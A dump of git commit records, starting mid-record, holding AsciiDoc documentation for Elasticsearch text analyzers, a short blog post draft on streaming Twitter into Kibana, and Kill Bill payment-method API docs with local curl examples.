following:\n\nCharacter Filter::\n* <<analysis-mapping-charfilter,Mapping Character Filter>>, configured to replace `:)` with `_happy_` and `:(` with `_sad_`\n\nTokenizer::\n* <<analysis-pattern-tokenizer,Pattern Tokenizer>>, configured to split on punctuation characters\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-stop-tokenfilter,Stop Token Filter>>, configured to use the pre-defined list of English stop words\n\n\nHere is an example:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": { <1>\n \"type\": \"custom\",\n \"char_filter\": [\n \"emoticons\"\n ],\n 
\"tokenizer\": \"punctuation\",\n \"filter\": [\n \"lowercase\",\n \"english_stop\"\n ]\n }\n },\n \"tokenizer\": {\n \"punctuation\": { <2>\n \"type\": \"pattern\",\n \"pattern\": \"[ .,!?]\"\n }\n },\n \"char_filter\": {\n \"emoticons\": { <3>\n \"type\": \"mapping\",\n \"mappings\": [\n \":) => _happy_\",\n \":( => _sad_\"\n ]\n }\n },\n \"filter\": {\n \"english_stop\": { <4>\n \"type\": \"stop\",\n \"stopwords\": \"_english_\"\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"I'm a :) person, and you?\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> Assigns the index a default custom analyzer, `my_custom_analyzer`. This\nanalyzer uses a custom tokenizer, character filter, and token filter that\nare defined later in the request.\n<2> Defines the custom `punctuation` tokenizer.\n<3> Defines the custom `emoticons` character filter.\n<4> Defines the custom `english_stop` token filter.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"i'm\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"_happy_\",\n \"start_offset\": 6,\n \"end_offset\": 8,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"person\",\n \"start_offset\": 9,\n \"end_offset\": 15,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"you\",\n \"start_offset\": 21,\n \"end_offset\": 24,\n \"type\": \"word\",\n \"position\": 5\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ i'm, _happy_, person, you ]\n---------------------------\n","old_contents":"[[analysis-custom-analyzer]]\n=== Custom Analyzer\n\nWhen the built-in analyzers do not fulfill your needs, you can create a\n`custom` analyzer which uses the appropriate combination of:\n\n* zero or more <<analysis-charfilters, character filters>>\n* a <<analysis-tokenizers,tokenizer>>\n* zero or more <<analysis-tokenfilters,token filters>>.\n\n[float]\n=== Configuration\n\nThe `custom` analyzer accepts the following parameters:\n\n[horizontal]\n`tokenizer`::\n\n A built-in or customised <<analysis-tokenizers,tokenizer>>.\n (Required)\n\n`char_filter`::\n\n An optional array of built-in or customised\n <<analysis-charfilters, character filters>>.\n\n`filter`::\n\n An optional array of built-in or customised\n <<analysis-tokenfilters, token filters>>.\n\n`position_increment_gap`::\n\n When indexing an array of text values, Elasticsearch inserts a fake \"gap\"\n between the last term of one value and the first term of the next value to\n ensure that a phrase query doesn't match two terms from different array\n elements. Defaults to `100`. 
See <<position-increment-gap>> for more.\n\n[float]\n=== Example configuration\n\nHere is an example that combines the following:\n\nCharacter Filter::\n* <<analysis-htmlstrip-charfilter,HTML Strip Character Filter>>\n\nTokenizer::\n* <<analysis-standard-tokenizer,Standard Tokenizer>>\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-asciifolding-tokenfilter,ASCII-Folding Token Filter>>\n\n[source,js]\n--------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\", <1>\n \"tokenizer\": \"standard\",\n \"char_filter\": [\n \"html_strip\"\n ],\n \"filter\": [\n \"lowercase\",\n \"asciifolding\"\n ]\n }\n }\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"Is this <b>d\u00e9j\u00e0 vu<\/b>?\"\n}\n--------------------------------\n\/\/ CONSOLE\n\n<1> Setting `type` to `custom` tells Elasticsearch that we are defining a custom analyzer.\n Compare this to how <<configuring-analyzers,built-in analyzers can be configured>>:\n `type` will be set to the name of the built-in analyzer, like\n <<analysis-standard-analyzer,`standard`>> or <<analysis-simple-analyzer,`simple`>>.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"is\",\n \"start_offset\": 0,\n \"end_offset\": 2,\n \"type\": \"<ALPHANUM>\",\n \"position\": 0\n },\n {\n \"token\": \"this\",\n \"start_offset\": 3,\n \"end_offset\": 7,\n \"type\": \"<ALPHANUM>\",\n \"position\": 1\n },\n {\n \"token\": \"deja\",\n \"start_offset\": 11,\n \"end_offset\": 15,\n \"type\": \"<ALPHANUM>\",\n \"position\": 2\n },\n {\n \"token\": \"vu\",\n \"start_offset\": 16,\n \"end_offset\": 22,\n \"type\": \"<ALPHANUM>\",\n \"position\": 3\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ is, this, deja, vu ]\n---------------------------\n\nThe previous example used tokenizer, token filters, and character filters with\ntheir default configurations, but it is possible to create configured versions\nof each and to use them in a custom analyzer.\n\nHere is a more complicated example that combines the following:\n\nCharacter Filter::\n* <<analysis-mapping-charfilter,Mapping Character Filter>>, configured to replace `:)` with `_happy_` and `:(` with `_sad_`\n\nTokenizer::\n* <<analysis-pattern-tokenizer,Pattern Tokenizer>>, configured to split on punctuation characters\n\nToken Filters::\n* <<analysis-lowercase-tokenfilter,Lowercase Token Filter>>\n* <<analysis-stop-tokenfilter,Stop Token Filter>>, configured to use the pre-defined list of English stop words\n\n\nHere is an example:\n\n[source,js]\n--------------------------------------------------\nPUT my_index\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"my_custom_analyzer\": {\n \"type\": \"custom\",\n \"char_filter\": [\n \"emoticons\" <1>\n ],\n \"tokenizer\": \"punctuation\", <1>\n \"filter\": [\n \"lowercase\",\n \"english_stop\" <1>\n ]\n }\n },\n \"tokenizer\": {\n \"punctuation\": { <1>\n \"type\": \"pattern\",\n \"pattern\": \"[ .,!?]\"\n }\n },\n \"char_filter\": {\n \"emoticons\": { <1>\n \"type\": \"mapping\",\n \"mappings\": [\n \":) => _happy_\",\n \":( => _sad_\"\n ]\n }\n },\n \"filter\": {\n \"english_stop\": { <1>\n \"type\": \"stop\",\n \"stopwords\": \"_english_\"\n }\n 
}\n }\n }\n}\n\nPOST my_index\/_analyze\n{\n \"analyzer\": \"my_custom_analyzer\",\n \"text\": \"I'm a :) person, and you?\"\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\n<1> The `emoticons` character filter, `punctuation` tokenizer and\n `english_stop` token filter are custom implementations which are defined\n in the same index settings.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"i'm\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"_happy_\",\n \"start_offset\": 6,\n \"end_offset\": 8,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"person\",\n \"start_offset\": 9,\n \"end_offset\": 15,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"you\",\n \"start_offset\": 21,\n \"end_offset\": 24,\n \"type\": \"word\",\n \"position\": 5\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above example produces the following terms:\n\n[source,text]\n---------------------------\n[ i'm, _happy_, person, you ]\n---------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f47886e44a1448ab1ff9b0bf25364a567513af48","subject":"[DOCS] Modified section headings, edited text for clarity. (#44988)","message":"[DOCS] Modified section headings, edited text for clarity. (#44988)\n\n* [DOCS] Modified section headings, edited text for clarity.\r\n\r\n* [DOCS] Modified section headings, edited text for clarity.\r\n\r\n* [DOCS] Modified section headings, edited text for clarity.\r\n","repos":"uschindler\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/reference\/analysis\/analyzers\/simple-analyzer.asciidoc","new_file":"docs\/reference\/analysis\/analyzers\/simple-analyzer.asciidoc","new_contents":"[[analysis-simple-analyzer]]\n=== Simple Analyzer\n\nThe `simple` analyzer breaks text into terms at any non-letter character, such\nas numbers, spaces, hyphens and apostrophes, discards non-letter characters, \nand changes uppercase to lowercase.\n\n==== Example\n\n[source,js]\n---------------------------\nPOST _analyze\n{\n \"analyzer\": \"simple\",\n \"text\": \"The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.\"\n}\n---------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"the\",\n 
\"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"quick\",\n \"start_offset\": 6,\n \"end_offset\": 11,\n \"type\": \"word\",\n \"position\": 1\n },\n {\n \"token\": \"brown\",\n \"start_offset\": 12,\n \"end_offset\": 17,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"foxes\",\n \"start_offset\": 18,\n \"end_offset\": 23,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"jumped\",\n \"start_offset\": 24,\n \"end_offset\": 30,\n \"type\": \"word\",\n \"position\": 4\n },\n {\n \"token\": \"over\",\n \"start_offset\": 31,\n \"end_offset\": 35,\n \"type\": \"word\",\n \"position\": 5\n },\n {\n \"token\": \"the\",\n \"start_offset\": 36,\n \"end_offset\": 39,\n \"type\": \"word\",\n \"position\": 6\n },\n {\n \"token\": \"lazy\",\n \"start_offset\": 40,\n \"end_offset\": 44,\n \"type\": \"word\",\n \"position\": 7\n },\n {\n \"token\": \"dog\",\n \"start_offset\": 45,\n \"end_offset\": 48,\n \"type\": \"word\",\n \"position\": 8\n },\n {\n \"token\": \"s\",\n \"start_offset\": 49,\n \"end_offset\": 50,\n \"type\": \"word\",\n \"position\": 9\n },\n {\n \"token\": \"bone\",\n \"start_offset\": 51,\n \"end_offset\": 55,\n \"type\": \"word\",\n \"position\": 10\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe `simple` analyzer parses the sentence and produces the following \nterms: \n\n[source,text]\n---------------------------\n[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ]\n---------------------------\n\n==== Configure parameters\n\nThe `simple` analyzer does not contain configurable parameters. \n\n==== Customize\n\nThe `simple` analyzer is defined by one tokenizer:\n\nTokenizer::\n* <<analysis-lowercase-tokenizer,Lower Case Tokenizer>>\n\nTo customize the `simple` analyzer, duplicate it to create the basis for \na `custom` analyzer. The new analyzer can be modified as required, usually by \nadding token filters.\n\n===== Example\n\n[source,js]\n----------------------------------------------------\nPUT \/simple_example\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"rebuilt_simple\": {\n \"tokenizer\": \"lowercase\",\n \"filter\": [ <1>\n ]\n }\n }\n }\n }\n}\n----------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/\\n$\/\\nstartyaml\\n - compare_analyzers: {index: simple_example, first: simple, second: rebuilt_simple}\\nendyaml\\n\/]\n<1> Add token filters here.\n","old_contents":"[[analysis-simple-analyzer]]\n=== Simple Analyzer\n\nThe `simple` analyzer breaks text into terms whenever it encounters a\ncharacter which is not a letter. 
All terms are lower cased.\n\n[float]\n=== Example output\n\n[source,js]\n---------------------------\nPOST _analyze\n{\n \"analyzer\": \"simple\",\n \"text\": \"The 2 QUICK Brown-Foxes jumped over the lazy dog's bone.\"\n}\n---------------------------\n\/\/ CONSOLE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n----------------------------\n{\n \"tokens\": [\n {\n \"token\": \"the\",\n \"start_offset\": 0,\n \"end_offset\": 3,\n \"type\": \"word\",\n \"position\": 0\n },\n {\n \"token\": \"quick\",\n \"start_offset\": 6,\n \"end_offset\": 11,\n \"type\": \"word\",\n \"position\": 1\n },\n {\n \"token\": \"brown\",\n \"start_offset\": 12,\n \"end_offset\": 17,\n \"type\": \"word\",\n \"position\": 2\n },\n {\n \"token\": \"foxes\",\n \"start_offset\": 18,\n \"end_offset\": 23,\n \"type\": \"word\",\n \"position\": 3\n },\n {\n \"token\": \"jumped\",\n \"start_offset\": 24,\n \"end_offset\": 30,\n \"type\": \"word\",\n \"position\": 4\n },\n {\n \"token\": \"over\",\n \"start_offset\": 31,\n \"end_offset\": 35,\n \"type\": \"word\",\n \"position\": 5\n },\n {\n \"token\": \"the\",\n \"start_offset\": 36,\n \"end_offset\": 39,\n \"type\": \"word\",\n \"position\": 6\n },\n {\n \"token\": \"lazy\",\n \"start_offset\": 40,\n \"end_offset\": 44,\n \"type\": \"word\",\n \"position\": 7\n },\n {\n \"token\": \"dog\",\n \"start_offset\": 45,\n \"end_offset\": 48,\n \"type\": \"word\",\n \"position\": 8\n },\n {\n \"token\": \"s\",\n \"start_offset\": 49,\n \"end_offset\": 50,\n \"type\": \"word\",\n \"position\": 9\n },\n {\n \"token\": \"bone\",\n \"start_offset\": 51,\n \"end_offset\": 55,\n \"type\": \"word\",\n \"position\": 10\n }\n ]\n}\n----------------------------\n\/\/ TESTRESPONSE\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n\nThe above sentence would produce the following terms:\n\n[source,text]\n---------------------------\n[ the, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ]\n---------------------------\n\n[float]\n=== Configuration\n\nThe `simple` analyzer is not configurable.\n\n[float]\n=== Definition\n\nThe `simple` analzyer consists of:\n\nTokenizer::\n* <<analysis-lowercase-tokenizer,Lower Case Tokenizer>>\n\nIf you need to customize the `simple` analyzer then you need to recreate\nit as a `custom` analyzer and modify it, usually by adding token filters.\nThis would recreate the built-in `simple` analyzer and you can use it as\na starting point for further customization:\n\n[source,js]\n----------------------------------------------------\nPUT \/simple_example\n{\n \"settings\": {\n \"analysis\": {\n \"analyzer\": {\n \"rebuilt_simple\": {\n \"tokenizer\": \"lowercase\",\n \"filter\": [ <1>\n ]\n }\n }\n }\n }\n}\n----------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/\\n$\/\\nstartyaml\\n - compare_analyzers: {index: simple_example, first: simple, second: rebuilt_simple}\\nendyaml\\n\/]\n<1> You'd add any token filters here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64b4929d5620dbd79309520adf7b7d69665428f0","subject":"Update 2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","message":"Update 
2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","repos":"rvegas\/rvegas.github.io,rvegas\/rvegas.github.io,rvegas\/rvegas.github.io","old_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","new_file":"_posts\/2015-05-24-Livestreaming-twitter-updates-into-Kibana-using-Firehose-and-RabbitMQ.adoc","new_contents":"# Livestreaming twitter updates into Kibana using Firehose and RabbitMQ\n\n:hp-tags: twitter, kibana, elasticsearch, php\n\nLast time I wrote a small guide or actually a log of what it took me to build a elasticsearch cluster using vagrant and puphet. Since then I've been working some more with elasticsearch and discovered link:https:\/\/www.elastic.co\/products\/kibana[Kibana] and wow isn't that something cool!?\n\n*Kibana* is a visualization tool that is architected to work with *elasticsearch*, it can also load data from many other sources and it has many many features just like elasticsearch does.\n\nI decided then to put up a small experiment by reading *Twitter* status updates and dumping them into a elastic search collection so I could later build some graphs based on the characteristics of the tweets (language, sentiment, place, brand, user, whatever I could get).\n\n## Kibana, RabbitMQ, Firehose???\n\n","old_contents":"# Livestreaming twitter updates into Kibana using Firehose and RabbitMQ\n\n:hp-tags: twitter, kibana, elasticsearch, php\n\nLast time I wrote a small guide or actually a log of what it took me to build a elasticsearch cluster using vagrant and puphet. Since then I've been working some more with elasticsearch and discovered link:https:\/\/www.elastic.co\/products\/kibana[Kibana] and wow isn't that something cool!?\n\n*Kibana* is a visualization tool that is architected to work with *elasticsearch*, it can also load data from many other sources and it has many many features just like elasticsearch does.\n\nI decided then to put up a small experiment by reading *Twitter* status updates and dumping them into a elastic search collection so I could later build some graphs based on the characteristics of the tweets (language, sentiment, place, brand, user, whatever I could get).","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff17b3b3bb238a3659aedda6c47b1f74a7ed3909","subject":"Removed outdated information","message":"Removed outdated information","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-method-apis.adoc","new_file":"userguide\/payment\/includes\/payment-method-apis.adoc","new_contents":"The first step when registering payment methods is to create an account in Kill Bill. This needs to be done once:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"name\":\"john\",\"email\":\"john@foo.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n----\n\nThis call will return a 201 Location header containing the id associated with the newly created account. 
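If you are scripting these calls, the account id can be captured from that header. The following is a minimal sketch assuming standard shell tools; the header parsing is illustrative and not part of the official docs:

[source,bash]
----
# -si keeps the response headers; the account id is the last path
# segment of the returned Location header.
ACCOUNT_ID=$(curl -si \
     -X POST \
     -u admin:password \
     -H 'Content-Type: application/json' \
     -H 'X-Killbill-ApiKey:bob' \
     -H 'X-Killbill-ApiSecret:lazar' \
     -H 'X-Killbill-CreatedBy: creator' \
     --data-binary '{"name":"john","email":"john@foo.com","currency":"USD"}' \
     "http://127.0.0.1:8080/1.0/kb/accounts" \
     | grep -i '^location:' | sed 's#.*/##' | tr -d '[:space:]')
echo "${ACCOUNT_ID}"
----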
The rest of this document will assume this id is `268983f2-5443-47e4-a967-b8962fc699c5`, make sure to update your commands accordingly.\n\nTo add a payment method, POST the following information:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nThis will create a default payment method associated with our account and the __EXTERNAL_PAYMENT__ plugin. *The `pluginInfo` fields are specific to the plugin* and can be seen as a contract between the client of the API and the plugin itself (opaque to Kill Bill). For example, to add a payment method corresponding to Stripe via a token, the https:\/\/github.com\/killbill\/killbill-stripe-plugin[Stripe plugin] expects a field named `token`, with the value of the https:\/\/stripe.com\/docs\/api\/tokens[Stripe token].\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-paypal-express\",\n \"pluginInfo\": {\n \"properties\": [{\n \"key\": \"token\",\n \"value\": \"20G53990M6953444J\"\n }]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-stripe-demo[Stripe demo] for an implementation example.\n\nYou can add as many payment methods as needed to a given account (across one or multiple plugins). You can specify for each payment call the payment method to use, or leave it blank to use the default.\n\nEach payment method in Kill Bill has a unique uuid associated to it. Use this uuid to change the default payment method on the account (in this example, the payment method id `a91161b0-d159-11e3-9c1a-0800200c9a66` becomes the default one):\n\n\n[source,bash]\n----\ncurl -v \\\n -X PUT \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\/setDefault\"\n----\n\n\nTo get information on a payment method, use the following endpoint:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66?withPluginInfo=true\"\n----\n\nThe `withPluginInfo` query parameter tells Kill Bill to fetch plugin specific properties. 
These properties are custom key\/value pairs the plugin knows about the payment method, that are specific to that payment method.\n\n\nTo delete a payment method:\n\n[source,bash]\n----\ncurl -v \\\n -X DELETE \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\"\n----\n\nThe payment method will be marked as inactive in Kill Bill. The actual deletion of the information is plugin specific (delete the information in the gateway, etc.).\n\nNote that by default you cannot delete the default payment method on an account (because it is assumed to be used for recurring payments). If you really want to delete it though, you can pass the query parameter deleteDefaultPmWithAutoPayOff=true to the previous call. This will delete it and set the account in AUTO_PAY_OFF (invoices won't be paid automatically anymore).\n","old_contents":"The first step when registering payment methods is to create an account in Kill Bill. This needs to be done once:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"name\":\"john\",\"email\":\"john@foo.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n----\n\nThis call will return a 201 Location header containing the id associated with the newly created account. The rest of this document will assume this id is `268983f2-5443-47e4-a967-b8962fc699c5`, make sure to update your commands accordingly.\n\nTo add a payment method, POST the following information:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nThis will create a default payment method associated with our account and the __EXTERNAL_PAYMENT__ plugin. *The `pluginInfo` fields are specific to the plugin* and can be seen as a contract between the client of the API and the plugin itself (opaque to Kill Bill). For example, to add a payment method stored in PayPal, the https:\/\/github.com\/killbill\/killbill-paypal-express-plugin[PayPal Express plugin] expects a field named `token`, with the value of the Paypal BAID.\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-paypal-express\",\n \"pluginInfo\": {\n \"properties\": [{\n \"key\": \"token\",\n \"value\": \"20G53990M6953444J\"\n }]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-paypal-demo[PayPal demo] for an implementation example.\n\nThe https:\/\/github.com\/killbill\/killbill-litle-plugin[Litle&Co. 
plugin] on the other hand expects some fields like the `paypageRegistrationId` (using Litle's tokenization service):\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n --data-binary '{\n \"pluginName\": \"killbill-litle\",\n \"pluginInfo\": {\n \"properties\": [\n {\n \"key\": \"paypageRegistrationId\",\n \"value\": \"t3GER3BP3JHLASZe\"\n },\n {\n \"key\": \"ccFirstName\",\n \"value\": \"John\"\n },\n {\n \"key\": \"ccLastName\",\n \"value\": \"Doe\"\n },\n {\n \"key\": \"ccType\",\n \"value\": \"VISA\"\n },\n {\n \"key\": \"ccExpirationMonth\",\n \"value\": \"12\"\n },\n {\n \"key\": \"ccExpirationYear\",\n \"value\": \"2015\"\n },\n {\n \"key\": \"ccLast4\",\n \"value\": \"1234\"\n },\n {\n \"key\": \"address1\",\n \"value\": \"5, oakriu road\"\n },\n {\n \"key\": \"address2\",\n \"value\": \"apt. 298\"\n },\n {\n \"key\": \"city\",\n \"value\": \"Gdio Foia\"\n },\n {\n \"key\": \"state\",\n \"value\": \"FL\"\n },\n {\n \"key\": \"zip\",\n \"value\": \"49302\"\n },\n {\n \"key\": \"country\",\n \"value\": \"IFP\"\n }\n ]\n }\n }' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods?isDefault=true\"\n----\n\nCheck our https:\/\/github.com\/killbill\/killbill-litle-demo[Litle demo] for an implementation example.\n\nYou can add as many payment methods as needed to a given account (across one or multiple plugins). You can specify for each payment call the payment method to use, or leave it blank to use the default.\n\nEach payment method in Kill Bill has a unique uuid associated to it. Use this uuid to change the default payment method on the account (in this example, the payment method id `a91161b0-d159-11e3-9c1a-0800200c9a66` becomes the default one):\n\n\n[source,bash]\n----\ncurl -v \\\n -X PUT \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/268983f2-5443-47e4-a967-b8962fc699c5\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66\/setDefault\"\n----\n\n\nTo get information on a payment method, use the following endpoint:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/paymentMethods\/a91161b0-d159-11e3-9c1a-0800200c9a66?withPluginInfo=true\"\n----\n\nThe `withPluginInfo` query parameter tells Kill Bill to fetch plugin specific properties. These properties are custom key\/value pairs the plugin knows about the payment method, that are specific to that payment method.\n\n\nTo delete a payment method:\n\n[source,bash]\n----\ncurl -v \\\n -X DELETE \\\n -u admin:password \\\n -H 'Content-Type: application\/json' \\\n -H 'X-Killbill-ApiKey:bob' \\\n -H 'X-Killbill-ApiSecret:lazar' \\\n -H 'X-Killbill-CreatedBy: creator' \\\n 